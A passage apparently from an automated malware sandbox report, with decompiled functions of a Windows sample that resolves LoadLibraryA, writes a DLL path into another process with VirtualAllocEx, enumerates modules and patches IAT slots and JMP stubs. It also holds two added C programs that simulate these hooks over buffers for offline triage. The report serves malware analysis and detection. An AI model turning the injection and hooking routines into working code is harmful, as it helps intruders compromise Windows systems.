                                          • Opcode ID: 2b542fb69e9b2bf4769b48f0971daf688429c48db960eb26e3bd51be998ae4a2
                                          • Instruction ID: 08050505628e6808722e814cbaf11fcc74e5f653f0d4663ec733fa0de34078f8
                                          • Opcode Fuzzy Hash: 2b542fb69e9b2bf4769b48f0971daf688429c48db960eb26e3bd51be998ae4a2
                                          • Instruction Fuzzy Hash: 7F214D71D4060AAFDB209FB5CC49BADBB78BB04751F108215F611A6192D735EA12DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%
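
                                          Added example, not code from the sample or from this report: the two patch modes of E00AB3A4F redone over an ordinary byte buffer in place of the process memory the sample unprotects with VirtualProtect, so the arithmetic can be checked offline. Mode 1 overwrites a 4-byte slot (the shape of an IAT entry) with the value at +0x10; mode 2 first retargets an existing 5-byte `E9 rel32` stub at +0x14 so that it lands on the address at +0x08, computing rel32 = destination - stub - 5 exactly as the line `*(_t44 + 1) = *(_t47 + 8) - _t44 - 5` does, then falls through to the slot write. The record field names and offsets are my reading of the decompile and are assumptions; the addresses 0x100, 0x300 and 0x400 are constructed. The decoder and the out-of-module check are the triage counterpart: a function whose first byte is E9 and whose JMP leaves its own module is what this kind of hook looks like in a dump.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Simulated process memory: "addresses" below are offsets into this buffer,
 * standing in for the pages E00AB3A4F makes writable with VirtualProtect. */
#define MEM_SIZE 0x1000
typedef struct { uint8_t bytes[MEM_SIZE]; } Mem;

/* Record layout as read off the decompile (assumption; only these fields are used). */
struct hook_rec {
    uint32_t reserved0;   /* +0x00 */
    uint32_t reserved1;   /* +0x04 */
    uint32_t dest;        /* +0x08  address the JMP stub should land on */
    uint32_t slot;        /* +0x0c  address of a 4-byte slot (e.g. an IAT entry) */
    uint32_t value;       /* +0x10  value written into that slot */
    uint32_t jmp_site;    /* +0x14  address of a 5-byte E9 rel32 stub */
    uint32_t reserved6;   /* +0x18 */
    uint32_t flags;       /* +0x1c  low byte: mode (1 or 2); bit 0x100: pending */
};

static uint32_t rd32(const Mem *m, uint32_t a) { uint32_t v; memcpy(&v, &m->bytes[a], 4); return v; }
static void     wr32(Mem *m, uint32_t a, uint32_t v) { memcpy(&m->bytes[a], &v, 4); }

/* rel32 for a 5-byte JMP at `site` landing on `dest`: destination - site - 5. */
int32_t jmp_rel32(uint32_t site, uint32_t dest) {
    return (int32_t)(dest - site - 5u);
}

/* Inverse, for triage: where does the JMP at `site` go? 0 if the byte is not E9. */
uint32_t jmp_target(const Mem *m, uint32_t site) {
    if (site > MEM_SIZE - 5 || m->bytes[site] != 0xE9) return 0;
    int32_t rel; memcpy(&rel, &m->bytes[site + 1], 4);
    return site + 5 + (uint32_t)rel;
}

/* Mirrors E00AB3A4F. Returns 0 on success, -1 where the sample would record
 * GetLastError because the slot could not be made writable. */
int apply_hook(Mem *m, struct hook_rec *r) {
    uint8_t mode = (uint8_t)(r->flags & 0xff);
    if (mode != 1 && mode != 2) return 0;            /* other modes: nothing to do */
    if (mode == 2 && r->jmp_site <= MEM_SIZE - 5 && m->bytes[r->jmp_site] == 0xE9) {
        int32_t rel = jmp_rel32(r->jmp_site, r->dest);   /* retarget the existing stub */
        memcpy(&m->bytes[r->jmp_site + 1], &rel, 4);
    }
    if (r->slot > MEM_SIZE - 4) return -1;            /* VirtualProtect failure stand-in */
    wr32(m, r->slot, r->value);                       /* 4-byte slot overwrite */
    r->flags &= ~0x100u;                              /* clear the pending bit */
    return 0;
}

/* Detection: first byte E9 and a JMP target outside [mod_lo, mod_hi) means the
 * function has been inline-hooked by code living outside its own module. */
int hooked_out_of_module(const Mem *m, uint32_t func, uint32_t mod_lo, uint32_t mod_hi) {
    uint32_t t = jmp_target(m, func);
    return t != 0 && (t < mod_lo || t >= mod_hi);
}

/* Constructed scenario: an `E9 00 00 00 00` stub at 0x100 inside a "module"
 * spanning [0x100, 0x200), an IAT slot at 0x400, replacement code at 0x300.
 * Returns how many of the five expected post-conditions hold. */
int scenario(void) {
    Mem m; memset(&m, 0, sizeof m);
    m.bytes[0x100] = 0xE9;
    struct hook_rec r = { 0, 0, 0x300, 0x400, 0x300, 0x100, 0, 0x102 };
    int ok = 0;
    ok += apply_hook(&m, &r) == 0;
    ok += jmp_target(&m, 0x100) == 0x300;            /* stub now jumps to the hook */
    ok += rd32(&m, 0x400) == 0x300;                  /* IAT slot points at the hook */
    ok += r.flags == 2;                              /* pending bit cleared, mode kept */
    ok += hooked_out_of_module(&m, 0x100, 0x100, 0x200) == 1;
    return ok;
}

int main(void) {
    printf("rel32 for JMP 0x100 -> 0x300: 0x%x\n", (unsigned)jmp_rel32(0x100, 0x300));
    printf("scenario checks passed: %d/5\n", scenario());
    return 0;
}
```

The same rel32 formula, applied to a real dump, is how an analyst recovers the hook destination from a patched prologue: read the four bytes after the E9, sign-extend, add the stub address plus 5.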

                                          C-Code - Quality: 68%
                                          			E00AB3309(void* __ecx, signed int __edx, intOrPtr* _a4, CHAR* _a8) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed int _t11;
                                          				void* _t18;
                                          				CHAR* _t19;
                                          				signed int _t20;
                                          				void* _t21;
                                          				intOrPtr* _t22;
                                          				void* _t23;
                                          
                                          				_t20 = __edx;
                                          				_t18 = __ecx;
                                          				_t21 = 8;
                                          				_t23 = E00AB1490(0x318);
                                          				_t27 = _t23;
                                          				if(_t23 != 0) {
                                          					memset(_t23, 0, 0x318);
                                          					_t22 = _a4;
                                          					_push("LoadLibraryA");
                                          					_push("KERNEL32.DLL");
                                          					_push( *_t22);
                                          					_t11 = E00AB2A4E(0x318, _t18, _t22, _t23, _t27); // resolve LoadLibraryA in KERNEL32.DLL for the target referenced by *_a4; result comes back in edx:eax
                                          					 *(_t23 + 8) = _t11; // low dword of the resolved address
                                          					 *(_t23 + 0xc) = _t20; // high dword (edx)
                                          					if((_t11 | _t20) == 0) {
                                          						_t21 = 2;
                                          					} else {
                                          						_t5 = _t23 + 0x18; // 0x18
                                          						_t19 = _t5;
                                          						asm("cdq");
                                          						 *(_t23 + 0x10) = _t19;
                                          						 *(_t23 + 0x14) = _t20;
                                          						lstrcpyA(_t19, _a8); // unbounded copy of the DLL path into the 0x300 bytes that remain at +0x18 of the 0x318 block
                                          						_push(0);
                                          						_push(_t23);
                                          						_push(_t22);
                                          						_t21 = E00AB3383(_t19, _t20);
                                          					}
                                          					LocalFree(_t23);
                                          				}
                                          				return _t21;
                                          			}

                                          Instruction addresses for the C statements above, one per line in order (0x00000000 where a line has no instruction of its own):
                                          0x00ab3309
                                          0x00ab3309
                                          0x00ab3311
                                          0x00ab331d
                                          0x00ab331f
                                          0x00ab3321
                                          0x00ab3327
                                          0x00ab332c
                                          0x00ab332f
                                          0x00ab3334
                                          0x00ab3339
                                          0x00ab333b
                                          0x00ab3343
                                          0x00ab3348
                                          0x00ab334b
                                          0x00ab3375
                                          0x00ab334d
                                          0x00ab3350
                                          0x00ab3350
                                          0x00ab3355
                                          0x00ab3357
                                          0x00ab335a
                                          0x00ab335d
                                          0x00ab3363
                                          0x00ab3365
                                          0x00ab3366
                                          0x00ab336f
                                          0x00ab336f
                                          0x00ab3377
                                          0x00ab3377
                                          0x00ab3382

                                          APIs
                                            • Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496
                                          • memset.NTDLL ref: 00AB3327
                                            • Part of subcall function 00AB2A4E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2A8E
                                            • Part of subcall function 00AB2A4E: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,000004D0,00000008,00000000), ref: 00AB2B27
                                          • lstrcpyA.KERNEL32(00000018,00AB2344,?,?,?,00AB2344,?,?), ref: 00AB335D
                                            • Part of subcall function 00AB3383: memset.NTDLL ref: 00AB33AF
                                            • Part of subcall function 00AB3383: memcpy.NTDLL(?,00AB37D1,00000100,?,00000000,000004D0,00000008,00000000), ref: 00AB33DA
                                            • Part of subcall function 00AB3383: VirtualAllocEx.KERNELBASE(?,00000000,00000318,00003000,00000040,?,?,?,?,00000008,00000000), ref: 00AB33F4
                                          • LocalFree.KERNEL32(00000000,?,?,?,00AB2344,?,?), ref: 00AB3377
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual$FreeLocalmemset$lstrcpymemcpy
                                          • String ID: KERNEL32.DLL$LoadLibraryA
                                          • API String ID: 1924211247-1423781741
                                          • Opcode ID: 75c1cef331c936f9c15f86d096ba79363f77d0b5e6d5fa07300e0fe238f11675
                                          • Instruction ID: 5cb2e94233addc140b422155b9343e9fc0d0b4d7dd7cd632a6273ce299c7761e
                                          • Opcode Fuzzy Hash: 75c1cef331c936f9c15f86d096ba79363f77d0b5e6d5fa07300e0fe238f11675
                                          • Instruction Fuzzy Hash: F701DB72A41B147BC7306B359C01FDB7BECEF847A4F04452AF5059A253DA74EA0147E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%
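
                                          Added example, not code from the sample or from this report: a builder and a triage parser for the 0x318-byte block that E00AB3309 allocates (LocalAlloc(0x318), memset to zero) and hands to E00AB3383, which copies a 0x100-byte stub together with the block into the target via VirtualAllocEx. The field offsets are my reading of the decompile and are assumptions: the LoadLibraryA address returned by E00AB2A4E is stored at +0x08 (eax) and +0x0c (edx), so the field is 8 bytes wide; the pointer to the path goes to +0x10/+0x14 after `cdq` sign-extends the 32-bit buffer address; the path itself sits at +0x18, copied by lstrcpyA with no check against the 0x300 bytes left in the block. The builder bounds that copy where the sample does not. The context address 0x00B20000, the LoadLibraryA value 0x76A0B9D0 and the DLL path are constructed.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define CTX_SIZE     0x318                   /* LocalAlloc(0x318) in E00AB3309 */
#define CTX_LOADLIB  0x08                    /* u64: LoadLibraryA in the target */
#define CTX_PATHPTR  0x10                    /* u64: pointer to the path string */
#define CTX_PATH     0x18                    /* char[]: DLL path written by lstrcpyA */
#define CTX_PATH_MAX (CTX_SIZE - CTX_PATH)   /* 0x300 bytes including the NUL */

static void put64(uint8_t *p, uint64_t v) { for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static uint64_t get64(const uint8_t *p) { uint64_t v = 0; for (int i = 7; i >= 0; i--) v = (v << 8) | p[i]; return v; }

/* `cdq` sign-extends eax into edx:eax, so the stored pointer is the signed
 * widening of (ctx_addr + 0x18): buffers above 0x80000000 get 0xFFFFFFFF on top. */
uint64_t widen_like_cdq(uint32_t a) { return (uint64_t)(int64_t)(int32_t)a; }

/* Fill a context the way E00AB3309 does. Unlike the sample's lstrcpyA the copy is
 * bounded: a path that does not fit with its terminator is rejected with -1. */
int build_ctx(uint8_t out[CTX_SIZE], uint32_t ctx_addr, uint64_t loadlib, const char *path) {
    size_t n = strlen(path);
    if (n >= CTX_PATH_MAX) return -1;
    memset(out, 0, CTX_SIZE);
    put64(out + CTX_LOADLIB, loadlib);
    put64(out + CTX_PATHPTR, widen_like_cdq(ctx_addr + CTX_PATH));
    memcpy(out + CTX_PATH, path, n + 1);
    return 0;
}

/* Triage helper: pull the fields back out of a 0x318-byte blob carved from a dump.
 * Returns 0, or -1 if the blob is short or the path is not NUL-terminated. */
int parse_ctx(const uint8_t *buf, size_t len, uint64_t *loadlib, uint64_t *path_ptr,
              char *path, size_t path_cap) {
    if (len < CTX_SIZE) return -1;
    const uint8_t *p = buf + CTX_PATH;
    size_t n = 0;
    while (n < CTX_PATH_MAX && p[n] != 0) n++;
    if (n == CTX_PATH_MAX || n + 1 > path_cap) return -1;
    *loadlib  = get64(buf + CTX_LOADLIB);
    *path_ptr = get64(buf + CTX_PATHPTR);
    memcpy(path, p, n + 1);
    return 0;
}

/* Build, then parse, and report whether every field survived (1) or not (0). */
int roundtrip(uint32_t ctx_addr, uint64_t loadlib, const char *path) {
    uint8_t blob[CTX_SIZE]; uint64_t ll, pp; char out[CTX_PATH_MAX];
    if (build_ctx(blob, ctx_addr, loadlib, path) != 0) return 0;
    if (parse_ctx(blob, sizeof blob, &ll, &pp, out, sizeof out) != 0) return 0;
    return ll == loadlib && pp == widen_like_cdq(ctx_addr + CTX_PATH) && strcmp(out, path) == 0;
}

/* For checking the bound: a path of `n` 'A' characters; returns build_ctx's result. */
int build_with_len(size_t n) {
    if (n >= 0x1000) return -1;
    char path[0x1000]; memset(path, 'A', n); path[n] = 0;
    uint8_t blob[CTX_SIZE];
    return build_ctx(blob, 0x00B20000u, 0x76A0B9D0ULL, path);
}

int main(void) {
    uint8_t blob[CTX_SIZE]; uint64_t ll, pp; char path[CTX_PATH_MAX];
    build_ctx(blob, 0x00B20000u, 0x76A0B9D0ULL, "C:\\Users\\Public\\inject.dll");
    if (parse_ctx(blob, sizeof blob, &ll, &pp, path, sizeof path) == 0)
        printf("LoadLibraryA=0x%llx path_ptr=0x%llx path=%s\n",
               (unsigned long long)ll, (unsigned long long)pp, path);
    return 0;
}
```

When carving such a block from a memory dump, the path pointer is the useful consistency check: it should equal the block's own address plus 0x18 in the process that built it, sign-extended as shown.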

                                          C-Code - Quality: 91%
                                          			E00AB3E8E(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				char _v8;
                                          				void* _v12;
                                          				void* __ecx;
                                          				struct HINSTANCE__* _t19;
                                          				intOrPtr _t30;
                                          				struct HINSTANCE__* _t33;
                                          				void* _t35;
                                          				intOrPtr _t38;
                                          				void* _t39;
                                          				void* _t41;
                                          				signed int _t44;
                                          				void* _t46;
                                          				void* _t47;
                                          				void* _t48;
                                          				void* _t52;
                                          
                                          				_t39 = __edx;
                                          				_push(_t35);
                                          				_push(_t35);
                                          				_t19 = GetModuleHandleW(L"ADVAPI32.DLL");
                                          				_t44 = 0;
                                          				_t33 = _t19;
                                          				_t41 = E00AB3F38(_a12, _a16, 0);
                                          				_t47 = _t46 + 0xc;
                                          				if(_t41 == 0) {
                                          					_v12 = 0;
                                          					_v8 = 0;
                                          					_t41 = E00AB2D34(_t35, GetCurrentProcess(),  &_v12,  &_v8);
                                          					_t48 = _t47 + 0xc;
                                          					if(_t41 != 0) {
                                          						E00AB3B16(_a12, _a16);
                                          					} else {
                                          						_t38 = _v8;
                                          						if(_t38 != 0) {
                                          							do {
                                          								_t30 =  *((intOrPtr*)(_v12 + _t44 * 4));
                                          								_t52 = _t30 -  *0xb16d4c; // 0xab0000: the sample's own image base
                                          								if(_t52 != 0 && _t30 != _t33) { // process every loaded module except itself and ADVAPI32.DLL
                                          									E00AB3F38(_a4, _a8, _t30);
                                          									_t38 = _v8;
                                          									_t48 = _t48 + 0xc;
                                          								}
                                          								_t44 = _t44 + 1;
                                          							} while (_t44 < _t38);
                                          						}
                                          						LocalFree(_v12);
                                          						E00AB3FC3(_t39, _a4, _a8);
                                          					}
                                          				}
                                          				return _t41;
                                          			}

                                          Instruction addresses for the C statements above, one per line in order (0x00000000 where a line has no instruction of its own):
                                          0x00ab3e8e
                                          0x00ab3e91
                                          0x00ab3e92
                                          0x00ab3e9b
                                          0x00ab3ea1
                                          0x00ab3ea3
                                          0x00ab3eb1
                                          0x00ab3eb3
                                          0x00ab3eb8
                                          0x00ab3ebd
                                          0x00ab3ec4
                                          0x00ab3ed4
                                          0x00ab3ed6
                                          0x00ab3edb
                                          0x00ab3f28
                                          0x00ab3edd
                                          0x00ab3edd
                                          0x00ab3ee2
                                          0x00ab3ee4
                                          0x00ab3ee7
                                          0x00ab3eea
                                          0x00ab3ef0
                                          0x00ab3efd
                                          0x00ab3f02
                                          0x00ab3f05
                                          0x00ab3f05
                                          0x00ab3f08
                                          0x00ab3f09
                                          0x00ab3ee4
                                          0x00ab3f10
                                          0x00ab3f1b
                                          0x00ab3f1b
                                          0x00ab3f2e
                                          0x00ab3f37

                                          APIs
                                          • GetModuleHandleW.KERNEL32(ADVAPI32.DLL,00000000,00000000,?,00B16948,00B16948,?,00AB1B07,00B16948,00000004,00B169A8,00000004), ref: 00AB3E9B
                                            • Part of subcall function 00AB3F38: GetModuleHandleA.KERNEL32(00000002,00000000,00000000,00000000,?,00AB3EB1,00B16948,00AB1B07,00000000,?,00B16948,00B16948,?,00AB1B07,00B16948,00000004), ref: 00AB3F60
                                          • GetCurrentProcess.KERNEL32(00B169A8,00000004,00000004,00B169A8,00000004), ref: 00AB3EC8
                                            • Part of subcall function 00AB2D34: EnumProcessModules.PSAPI(?,00000000,00001000,00000000,00001000,00000000,00000000,00000000), ref: 00AB2D5F
                                            • Part of subcall function 00AB2D34: LocalFree.KERNEL32(00000000,?,00000000,00001000,00000000,00001000,00000000,00000000,00000000), ref: 00AB2D73
                                          • LocalFree.KERNEL32(?), ref: 00AB3F10
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHandleLocalModuleProcess$CurrentEnumModules
                                          • String ID: ADVAPI32.DLL
                                          • API String ID: 1860380997-33758204
                                          • Opcode ID: 983be7ea1d6367c69392dcf2448108a393fa1d3d816cbb450d5f806f17440a53
                                          • Instruction ID: d8ba9322877ef5200a147812a2d155ce6e22b4e197c7c2a4cc9e74737a14a598
                                          • Opcode Fuzzy Hash: 983be7ea1d6367c69392dcf2448108a393fa1d3d816cbb450d5f806f17440a53
                                          • Instruction Fuzzy Hash: 41115B32E00208BBCF15AFA5DD45DEE7FBDEF44360B504066F9049A222DA319F559BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00AB32D6(intOrPtr _a4) {
                                          				_Unknown_base(*)()* _t2;
                                          
                                          				_t2 =  *0xb16d78;
                                          				if(_t2 != 0) {
                                          					L2:
                                          					return  *_t2(_a4);
                                          				}
                                          				_t2 = GetProcAddress(GetModuleHandleW(L"KERNEL32.DLL"), "Wow64EnableWow64FsRedirection");
                                          				 *0xb16d78 = _t2;
                                          				if(_t2 != 0) {
                                          					goto L2;
                                          				}
                                          				return _t2;
                                          			}


                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,Wow64EnableWow64FsRedirection,?,00AB1533,00000000), ref: 00AB32EC
                                          • GetProcAddress.KERNEL32(00000000), ref: 00AB32F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: KERNEL32.DLL$Wow64EnableWow64FsRedirection
                                          • API String ID: 1646373207-2529553039
                                          • Opcode ID: 14d375d96342fe6c5e6e3f6ddbde9409d3538ed873b6be29bbe95749b198cefd
                                          • Instruction ID: d0515aabce4c44c5eb2835b6dc248849c0c7902a8a9622882300ac79df557984
                                          • Opcode Fuzzy Hash: 14d375d96342fe6c5e6e3f6ddbde9409d3538ed873b6be29bbe95749b198cefd
                                          • Instruction Fuzzy Hash: F4D05E31A40B056F9F01ABF5EC46FD63FACBB407087404030F414D6123DE20D9018A91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E00AB2D34(void* __ecx, intOrPtr _a4, void** _a8, unsigned int* _a12) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				unsigned int* _t14;
                                          				void* _t22;
                                          				unsigned int _t25;
                                          				long _t28;
                                          				void* _t31;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_t28 = 8;
                                          				_t22 = 0x1000;
                                          				_t31 = E00AB1490(0x1000);
                                          				if(_t31 == 0) {
                                          					L10:
                                          					return _t28;
                                          				} else {
                                          					goto L1;
                                          				}
                                          				while(1) {
                                          					L1:
                                          					_t14 =  &_v8;
                                          					_push(_t14);
                                          					_push(_t22);
                                          					_push(_t31);
                                          					_push(_a4);
                                          					L00AB45BC();
                                          					_v12 = _t14;
                                          					if(_t14 == 0) {
                                          						break;
                                          					}
                                          					_t25 = _v8;
                                          					if(_t22 > _t25) {
                                          						L6:
                                          						if(_t31 != 0) {
                                          							if(_t14 == 0) {
                                          								_t28 = GetLastError();
                                          								LocalFree(_t31);
                                          							} else {
                                          								_t28 = 0;
                                          								 *_a8 = _t31;
                                          								 *_a12 = _t25 >> 2;
                                          							}
                                          						}
                                          						goto L10;
                                          					}
                                          					LocalFree(_t31);
                                          					_t22 = _t22 + 0x1000;
                                          					_t31 = E00AB1490(_t22);
                                          					if(_t31 != 0) {
                                          						continue;
                                          					} else {
                                          						_t14 = _v12;
                                          						break;
                                          					}
                                          				}
                                          				_t25 = _v8;
                                          				goto L6;
                                          			}


                                          APIs
                                            • Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496
                                          • EnumProcessModules.PSAPI(?,00000000,00001000,00000000,00001000,00000000,00000000,00000000), ref: 00AB2D5F
                                          • LocalFree.KERNEL32(00000000,?,00000000,00001000,00000000,00001000,00000000,00000000,00000000), ref: 00AB2D73
                                          • GetLastError.KERNEL32(?,00000000,00001000,00000000,00001000,00000000,00000000,00000000), ref: 00AB2DA9
                                          • LocalFree.KERNEL32(00000000), ref: 00AB2DB2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Local$Free$AllocEnumErrorLastModulesProcess
                                          • String ID:
                                          • API String ID: 114004284-0
                                          • Opcode ID: f7dd6d21b111e350eb2e4b673854398d710e07ead776cd018dfb53c5d757657d
                                          • Instruction ID: a73ad3c021bd11f255436b759a345e01a3658574fe9b47a57bb707bdf4f1a04c
                                          • Opcode Fuzzy Hash: f7dd6d21b111e350eb2e4b673854398d710e07ead776cd018dfb53c5d757657d
                                          • Instruction Fuzzy Hash: 8411D6B2A11215ABE7219BA9CC55FEF77ACDF447A1F000166F804DB202EA74DD0087E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00AB29D6(void* __ecx, struct HINSTANCE__* _a4, void** _a8) {
                                          				long _v8;
                                          				long _t8;
                                          				long _t15;
                                          				long _t19;
                                          				void* _t22;
                                          
                                          				_t19 = 0;
                                          				_t15 = 0x104;
                                          				_t22 = E00AB1490(0x104);
                                          				if(_t22 == 0) {
                                          					L9:
                                          					_t19 = 8;
                                          					L10:
                                          					return _t19;
                                          				} else {
                                          					goto L1;
                                          				}
                                          				while(1) {
                                          					L1:
                                          					_t8 = GetModuleFileNameA(_a4, _t22, _t15);
                                          					_v8 = _t8;
                                          					if(_t8 == 0 || _t15 != _t8) {
                                          						break;
                                          					}
                                          					_t15 = _t15 + 0x104;
                                          					LocalFree(_t22);
                                          					_t22 = E00AB1490(_t15);
                                          					if(_t22 != 0) {
                                          						continue;
                                          					}
                                          					_t8 = _v8;
                                          					break;
                                          				}
                                          				if(_t22 == 0) {
                                          					goto L9;
                                          				}
                                          				if(_t8 == 0) {
                                          					_t19 = GetLastError();
                                          					LocalFree(_t22);
                                          				} else {
                                          					 *_a8 = _t22;
                                          				}
                                          				goto L10;
                                          			}


                                          APIs
                                            • Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496
                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB29F7
                                          • LocalFree.KERNEL32(00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8,00000000), ref: 00AB2A0F
                                          • GetLastError.KERNEL32(?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8,00000000), ref: 00AB2A32
                                          • LocalFree.KERNEL32(00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8,00000000), ref: 00AB2A3B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Local$Free$AllocErrorFileLastModuleName
                                          • String ID:
                                          • API String ID: 1353466770-0
                                          • Opcode ID: 3593cc71782aeceb40c0a01b0289f84b604c85a9df0ed96a90117b710d9e0a30
                                          • Instruction ID: d76ef29947bd84b773edfdf5a7a33c9f659ae8938258ed55c7b972b3ee42a834
                                          • Opcode Fuzzy Hash: 3593cc71782aeceb40c0a01b0289f84b604c85a9df0ed96a90117b710d9e0a30
                                          • Instruction Fuzzy Hash: A401D172E012256BC731A7A99C54BEBBBDCEF557E0B450126BD04D7213E970CC0083E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00AB2936(void* __ecx) {
                                          				intOrPtr _t1;
                                          				void* _t3;
                                          				void* _t4;
                                          
                                          				_t4 = __ecx;
                                          				_t1 =  *0xb16d84; // 0x0
                                          				if(_t1 == 0) {
                                          					_t1 = E00AB2DC0(_t3, _t4, GetModuleHandleW(L"KERNEL32.DLL"), "LoadLibraryA");
                                          					if(_t1 != 0) {
                                          						 *0xb16d84 = _t1;
                                          						return _t1;
                                          					}
                                          				}
                                          				return _t1;
                                          			}


                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,LoadLibraryA,00AB2E7B,00000000,?,00000000,?,00AB19FA,?,?,00000000), ref: 00AB2949
                                            • Part of subcall function 00AB2DC0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000008,?,00AB19FA,?,?,00000000), ref: 00AB2E16
                                            • Part of subcall function 00AB2DC0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E29
                                            • Part of subcall function 00AB2DC0: ReadFile.KERNEL32(00000000,?,00000004,?,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E40
                                            • Part of subcall function 00AB2DC0: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00AB2E56
                                            • Part of subcall function 00AB2DC0: LocalFree.KERNEL32(?,00000008,?,00AB19FA,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$Handle$CloseCreateFreeLocalModulePointerRead
                                          • String ID: KERNEL32.DLL$LoadLibraryA
                                          • API String ID: 1464854441-1423781741
